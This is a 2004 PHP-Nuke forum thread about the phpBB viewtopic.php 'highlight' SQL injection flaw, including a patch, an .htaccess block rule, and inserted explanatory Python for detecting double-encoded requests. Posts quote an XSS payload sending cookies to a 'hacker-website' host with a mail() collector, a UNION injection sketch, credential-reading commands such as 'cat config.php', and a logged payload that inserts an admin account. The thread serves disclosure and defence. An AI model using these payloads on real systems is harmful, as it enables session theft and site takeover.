Ravens PHP Scripts: Forums
Forum: Security - PHP Nuke
64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1164
Posted: Fri Nov 19, 2004 6:22 pm

Hi Folks

Just as a heads-up until Chatserv comes out with a new permanent update with a new port to phpBB 2.0.11, please be aware of the following.

There is a serious security exploit regarding the "highlight" function in phpBB.

Last month, I filled out a bug report, and that got followed up by several other users also filling in other problems relative to the highlight function after I first discovered several problems here and at [ Only registered users can see links on this board! Get registered or login! ]

See: [ Only registered users can see links on this board! Get registered or login! ]

As it turns out, one of those "other" problems was also a serious security exploit... While I won't go into the nasty situation that happened after that, (which is what got the folks over at phpBB to get off their butts and fix it).....I will say:

All users are URGED to IMMEDIATELY see the following report from phpBB and make the change!
[ Only registered users can see links on this board! Get registered or login! ]

The affected file is /modules/Forums/viewtopic.php


Just a heads-up!

_________________
Steph Benoit
100% Section 508 and W3C HTML5 and CSS Compliant (Truly) Code, because I love compliance. 
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
Posted: Fri Nov 19, 2004 7:00 pm

Thanks so much for this alert! If you were one of my customers I would reward you hostwise, but alas, I can't.
 
sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2496
Posted: Fri Nov 19, 2004 8:36 pm

Can someone enlighten me as to why urldecode() being removed is a patch for this problem?

_________________
openSUSE 11.4-x86 | Linux 2.6.37.1-1.2desktop i686 | KDE: 4.6.41>=4.7 | XFCE 4.8 | AMD Athlon(tm) XP 3000+ | MSI K7N2 Delta-L | 3GB Black Diamond DDR | GeForce 6200@433Mhz 512MB | Xorg 1.9.3 | NVIDIA 270.30
Raven
Posted: Fri Nov 19, 2004 8:37 pm

I asked 64bit also but haven't heard back.
 
Raven
Posted: Fri Nov 19, 2004 8:40 pm

Is it just me or do the links in your email notification no longer work?

Typical windblows. Reboot and all is well.


Last edited by Raven on Fri Nov 19, 2004 9:35 pm; edited 1 time in total 
64bitguy
Posted: Fri Nov 19, 2004 8:53 pm

Mine are working, but since updating to Firefox 1.0, they don't open in a new window but rather the one I'm working in... Which really slowed down the PM I just sent you...

lol

I'm off to find a solution for that now.

Anyway.. RE this problem. It should be noted that some are telling me that this is not a fix to the problems, but rather a patch to protect users. The fix is being worked on and will be released as part of 2.0.12.

I've given what little information remains about this incident to Raven. Most of the forum posts at phpBB regarding this issue have been deleted by the staff.

Anyway... I'll be back after StarGate. (What can I say, Priorities). Smile
 
southern
Client
Joined: Jan 29, 2004
Posts: 624
Posted: Fri Nov 19, 2004 9:04 pm

Frankly I see little difference between the break and the fix
Code:


Open viewtopic.php in any text editor. Find the following section of code:
Code:

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

   for($i = 0; $i < sizeof($words); $i++)
   {
 

and replace with:
Code:

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
   // Split words and phrases
   $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));

   for($i = 0; $i < sizeof($words); $i++)
   {
 

Please inform as many people as possible about this issue. If you're a hosting provider please inform your customers if possible. Else we advise you implement some level of additional security if you run ensim or have PHP running cgi under suexec, etc.

except for the urldecode thing and number of )s reduced from 4 to 3. What possible significance could that have in terms of security?
 
JRSweets
Worker
Joined: Aug 06, 2004
Posts: 192
Posted: Sat Nov 20, 2004 2:02 pm

[ Only registered users can see links on this board! Get registered or login! ]

That link has a little better explanation.
 
64bitguy
Posted: Sat Nov 20, 2004 2:12 pm

I did not include that link as it doesn't really explain the problem, but rather some of the hostilities that took place after it.

In fact this thread is pretty hostile itself (though it doesn't hold a candle to the other ones). As I said in my original post, there was a rather nasty situation that occurred following identification of the problems. Those threads have been deleted by phpbb admin personnel. I suspect this one will be as well.

All in all, things are pretty sensitive over at phpbb.com right now. I would suggest that users stay as far removed from this situation as possible to avoid any backlash (or tonguelashings) that has been experienced by others.

I've found that even asking specific questions about the exploit has been greeted by .... what I would define as "a defensive posture" on the part of phpbb folks, so again, I wouldn't post anything unless you are ready to deal with that. I would especially advise that nobody post anything else to the above listed thread as, again, some people seem to be still reeling from how this situation arose and was dealt with.

Just my two cents.

As a heads-up, my host got hacked via this exploit about 6 hours after I posted a notice on their site. I guess they didn't think it was as important as I advised. Oh well..... Some people never listen.
 
Raven
Posted: Sat Nov 20, 2004 2:18 pm

I have learned, as a general rule, if someone tells me to do this or that because they have first hand knowledge, I usually will do it, especially in matters of security. In this case I still don't understand the exploit and even less how that change stops it. But, better safe than sorry, that's for sure. Thanks once again.
 
sixonetonoffun
Posted: Sat Nov 20, 2004 2:38 pm

Funny stuff there! PHPBB is almost as bad as FB when it comes to their reputation with handling reported issues. I don't condone the lamer tactics used to secure credit for finding the bug, but it was really not much to ask for IMO. It's not like they tried to extort money, for pete's sake.
 
64bitguy
Posted: Sat Nov 20, 2004 3:11 pm

There are actually several bugs that are related to injection vulnerabilities... This one is the easiest, and thus this is why this warning is urgent.

Here's the breakdown.... I'm being careful not to say too much because this hole exists in many places, and I don't want the script kiddies to feel like they are being invited to attack anyone.

The bottom line is that "urldecode" (and magic quotes) changes %2527 into %27 (a single quote) and leaves the converted data unslashed.

In a nutshell, this function being where it is, is creating a SQL Injection vulnerability via that function.

In this case, the function is useless where it is, so it was removed as all it is doing is creating this hole in the code.

The preg_replace('#\b(')\b#i', '\1' function cannot do its thing because by highlighting any topic with %2527, you are leaving the hole open with a single quote (%27).

Removing the decode makes it so that this function doesn't convert the highlighted variable and leaves it unaltered, so that injection can't occur as it would be caught by line 1183 and generate an error.

Now, as an example, let's say that the %2527 query was followed by UNION, adminusername, adminpassword, xxx. This is where the real problem lies. You've basically bypassed all of the security in place by injecting a new query using highlight. Not a good thing.

It gets worse when you think about using viewtopic.php for XSS query.

For example, first let's say that they want your cookie.
[ Only registered users can see links on this board! Get registered or login! ]
Here, you could steal cookies by using:
&lt;script&gt;document.location='http://hacker-website/cookies.php?'+document.cookie&lt;/script&gt;
and in [ Only registered users can see links on this board! Get registered or login! ]

On that site, they would have a PHP file with something like:
mail("me at wherever dot com","cookies from phpbb",$http_cookie);
echo $http_cookie; //or you can send it with a variable name

Needless to say, these are problems. Some of this comes back to: [ Only registered users can see links on this board! Get registered or login! ]

Anyway... What I found interesting (and god, don't ask me how since all of that data got dumped when I upgraded NukeSentinel to 2.1.1) was that the first time I set this up as a test bed, NukeSentinel caught the UNION injection attempt. It did not pick up on the XSS exploit (I suspect because of how it is being done).

Anyway. I hope this helps explain what is going on.

P.S. If I'm saying too much, Raven.. please feel free to edit or destroy this message.

Thanks
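The following is an added example, not code from phpBB or from anyone in this thread, written to answer the question sixonetonoffun and southern raised (why dropping one urldecode() call is a fix) in runnable form. It models the request path with Python stand-ins for three PHP behaviours: PHP decodes a query-string value once when it fills $HTTP_GET_VARS, magic_quotes_gpc then runs addslashes() on that decoded value, and htmlspecialchars() with its default flags leaves a single quote untouched. Python's unquote_plus() is assumed to behave like PHP's urldecode() for these inputs; the helper names are the example's own.

```python
"""Why the second urldecode() in viewtopic.php opened a hole (added example)."""
from urllib.parse import unquote_plus


def php_addslashes(s: str) -> str:
    """Stand-in for PHP addslashes(): backslash-escape ', ", backslash and NUL."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def php_htmlspecialchars(s: str) -> str:
    """Stand-in for PHP htmlspecialchars() with default flags: & < > " only, not '."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def get_var(raw_query_value: str, magic_quotes: bool = True) -> str:
    """What $HTTP_GET_VARS['highlight'] holds: decoded exactly once, then slashed."""
    decoded = unquote_plus(raw_query_value)
    return php_addslashes(decoded) if magic_quotes else decoded


def highlight_words(get_value: str, second_urldecode: bool) -> list:
    """The explode() line from viewtopic.php, with urldecode() kept (2.0.10)
    or removed (the patch quoted earlier in this thread)."""
    value = unquote_plus(get_value) if second_urldecode else get_value
    return php_htmlspecialchars(value).strip().split(" ")


def has_unescaped_quote(s: str) -> bool:
    """True if a single quote appears that is not preceded by a backslash."""
    for i, ch in enumerate(s):
        if ch == "'" and (i == 0 or s[i - 1] != "\\"):
            return True
    return False


def compare(raw_query_value: str) -> dict:
    """Run one raw highlight= value through both versions and report whether an
    unescaped quote survives into the words that reach the SQL query."""
    stored = get_var(raw_query_value)
    result = {}
    for label, decode_again in (("vulnerable", True), ("patched", False)):
        words = highlight_words(stored, decode_again)
        result[label] = any(has_unescaped_quote(w) for w in words)
    return result


if __name__ == "__main__":
    # %27 is slashed by magic quotes in both versions; %2527 only becomes a quote
    # after the second decode, which runs AFTER the slashes were added.
    for raw in ("%27", "%2527", "install+guide"):
        print(raw, compare(raw))
```

The point the model makes visible: magic quotes only sees the once-decoded value, which for %2527 is the harmless text %27, so nothing gets slashed; the extra urldecode() then produces a bare quote that htmlspecialchars() does not touch. Without the second decode the value stays as the literal text %27.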
 
sixonetonoffun
Posted: Sun Nov 21, 2004 9:15 am

Thanks Steph. I assumed it was something being passed encoded; I didn't know the issue with urldecode was because of how it decoded the quotes. I run a hacked version of the scripting filters, but I haven't been able to pass code with either <scr+pt or &lt;scr+pt even through the default ones.
 
frankie_33
New Member
Joined: Dec 05, 2004
Posts: 1
Posted: Sun Dec 05, 2004 7:06 pm

64bitguy wrote:
There are actually several bugs that are related to injection vulnerabilities... This one is the easiest, and thus this is why this warning is urgent.

Here's the breakdown.... I'm being careful not to say too much because this hole exists in many places, and I don't want the script kiddies to feel like they are being invited to attack anyone.

The bottom line is that "urldecode" (and magic quotes) changes %2527 into %27 (a single quote) and leaves the converted data unslashed.

In a nutshell, this function being where it is, is creating a SQL Injection vulnerability via that function.

In this case, the function is useless where it is, so it was removed as all it is doing is creating this hole in the code.

The preg_replace('#\b(')\b#i', '\1' function cannot do its thing because by highlighting any topic with %2527, you are leaving the hole open with a single quote (%27).

Removing the decode makes it so that this function doesn't convert the highlighted variable and leaves it unaltered, so that injection can't occur as it would be caught by line 1183 and generate an error.

Now, as an example, let's say that the %2527 query was followed by UNION, adminusername, adminpassword, xxx. This is where the real problem lies. You've basically bypassed all of the security in place by injecting a new query using highlight. Not a good thing.

It gets worse when you think about using viewtopic.php for XSS query.

For example, first let's say that they want your cookie.
[ Only registered users can see links on this board! Get registered or login! ]
Here, you could steal cookies by using:
&lt;script&gt;document.location='http://hacker-website/cookies.php?'+document.cookie&lt;/script&gt;
and in [ Only registered users can see links on this board! Get registered or login! ]

On that site, they would have a PHP file with something like:
mail("me at wherever dot com","cookies from phpbb",$http_cookie);
echo $http_cookie; //or you can send it with a variable name



You are joking, right?
XSS is the very least of the problems with this exploit!
Why would anyone even bother with an XSS attempt when the true
danger of this exploit lies in the fact that the unescaped %2527 chr
results in injecting a system $cmd.
i.e. 'cat ../.passwd' on a shared host
or how about 'cat config.php'
Now that is the REAL danger!

So if anyone is running a version < 2.0.11,
update without delay!

Admins should also disable viewtopic.php if not updated.

c-ya

Quote:

Needless to say, these are problems. Some of this comes back to: [ Only registered users can see links on this board! Get registered or login! ]

Anyway... What I found interesting (and god, don't ask me how since all of that data got dumped when I upgraded NukeSentinel to 2.1.1) was that the first time I set this up as a test bed, NukeSentinel caught the UNION injection attempt. It did not pick up on the XSS exploit (I suspect because of how it is being done).

Anyway. I hope this helps explain what is going on.

P.S. If I'm saying too much, Raven.. please feel free to edit or destroy this message.

Thanks
 
blarneystone
Client
Joined: Sep 18, 2004
Posts: 62
Posted: Tue Dec 21, 2004 8:58 pm

Is this the same as the PHPBB Santy Worm Exploit?
 
hdonalds
New Member
Joined: Dec 18, 2004
Posts: 5
Posted: Wed Dec 22, 2004 9:26 am

Hi everyone, this is probably pretty basic...
I am seeing variations of this entry in my logs:
GET /viewtopic.php t=1144&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)......

After doing a little searching I found this was a SQL injection attempt.
I have recently upgraded to the latest version of PHP 4.x.

How can I block this type of stuff with Sentinel??

Thanks in advance!!
 
Raven
Posted: Wed Dec 22, 2004 9:36 am

The entire string resolves to

INSERT INTO phpbb_users(user_id,user_active,username,user_password,user_level) VALUES ('99999','1','lock','ba3c83348bddf7b368b478ac06d3340e','1')

We're looking into it and will report back.
 
chatserv
Member Emeritus
Joined: May 02, 2003
Posts: 1389
Location: Puerto Rico
Posted: Wed Dec 22, 2004 11:03 am

sixonetonoffun wrote:
Funny stuff there! PHPBB is almost as bad as FB when it comes to their reputation with handling reported issues. I don't condone the lamer tactics used to secure credit for finding the bug but it was really not much to ask for IMO. Its not like they tried to extort money for pete's sake.

I'd go as far as saying it is worse; much like PostNuke, they don't like using code implemented by non-members.
 
BohrMe
Hangin' Around
Joined: May 01, 2004
Posts: 28
Location: Fall River, MA
Posted: Wed Dec 22, 2004 11:21 am

This was also offered up on the phpBB site as a band-aid until an upgrade of the forum software can be made.

Add this to your .htaccess:
Code:
RewriteEngine on

RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527
RewriteRule ^.*$ - [F,L]

_________________
BohrMe
eSnider.net 
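The .htaccess rule above blocks the request at the web server; the same test can be run after the fact over access logs to see who has been probing a board (which is what hdonalds asked about). The script below is an added example, not code from the thread, from phpBB or from NukeSentinel. It applies the rule's test to the raw query string and generalises it slightly: any percent sign that was itself percent-encoded (%25 followed by two hex digits) inside the highlight value is flagged, not only %2527. The log lines are constructed for the example, and Apache's common log format is assumed; the function names are the example's own.

```python
"""Flag double-encoded highlight= requests in access logs (added example)."""
import re

# Apache common log format: client, ident, user, [timestamp], "METHOD target PROTO" ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*"'
)
# A percent sign that was itself percent-encoded, followed by two hex digits.
DOUBLE_ENCODED = re.compile(r"%25[0-9A-Fa-f]{2}")

# Constructed sample lines: a normal highlight, a double-encoded probe of the
# kind quoted earlier in the thread (shortened), a legitimately encoded quote,
# and an unrelated request. None of these are real log entries.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Dec/2004:09:20:01 -0600] "GET /modules/Forums/viewtopic.php?t=1144&highlight=install HTTP/1.1" 200 5120
203.0.113.9 - - [22/Dec/2004:09:21:14 -0600] "GET /modules/Forums/viewtopic.php?t=1144&highlight=%2527%252Eprobe HTTP/1.1" 200 5120
198.51.100.7 - - [22/Dec/2004:09:22:30 -0600] "GET /modules/Forums/viewtopic.php?t=7&highlight=don%27t HTTP/1.1" 200 4096
198.51.100.8 - - [22/Dec/2004:09:23:02 -0600] "GET /index.php HTTP/1.1" 200 2048
"""


def raw_query_params(target: str) -> list:
    """Split the request target's query string WITHOUT decoding it.
    Decoding first would turn %2527 into %27 and hide exactly what we look for."""
    _, _, query = target.partition("?")
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((name, value))
    return params


def is_double_encoded_highlight(target: str) -> bool:
    """True when a highlight= parameter carries a double-encoded character."""
    return any(
        name.lower() == "highlight" and DOUBLE_ENCODED.search(value)
        for name, value in raw_query_params(target)
    )


def scan_log(text: str) -> list:
    """Return (ip, timestamp, target) for each flagged request line."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m and is_double_encoded_highlight(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, ts, target in scan_log(SAMPLE_LOG):
        print(f"{ip} {ts} {target}")
```

The check deliberately works on the undecoded query string: once a value has been decoded, %2527 and %27 look identical, so a filter that decodes first cannot tell an ordinary quoted search term from a double-encoded one.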
BobMarion
Former Admin in Good Standing
Joined: Oct 30, 2002
Posts: 1037
Location: RedNeck Land (known as Kentucky)
Posted: Wed Dec 22, 2004 1:56 pm

Believe it or not NukeSentinel(tm) already blocks that attempt as a "Script" attack. I'm getting 10 to 15 of them a day on my site and they are getting blocked Smile

_________________
Bob Marion
Codito Ergo Sum
http://www.nukescripts.net 
Raven
Posted: Wed Dec 22, 2004 2:13 pm

I thought it was, but I wanted it confirmed Wink
 
chatserv
Posted: Wed Dec 22, 2004 2:21 pm

BobMarion wrote:
Believe it or not NukeSentinel(tm) already blocks that attempt as a "Script" attack. I'm getting 10 to 15 of them a day on my site and they are getting blocked Smile

Might be a good idea to expand the filter check to work with the Forums and their related modules.
 
Muffin
Client
Joined: Apr 10, 2004
Posts: 649
Location: UK
Posted: Sat Dec 25, 2004 5:07 pm

Has this been implemented in Chat's latest patched series please?

_________________
Classic Mini rules the bends & bends the rules!
chatserv
Posted: Tue Dec 28, 2004 11:05 am

The patch already had the script block.
 
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours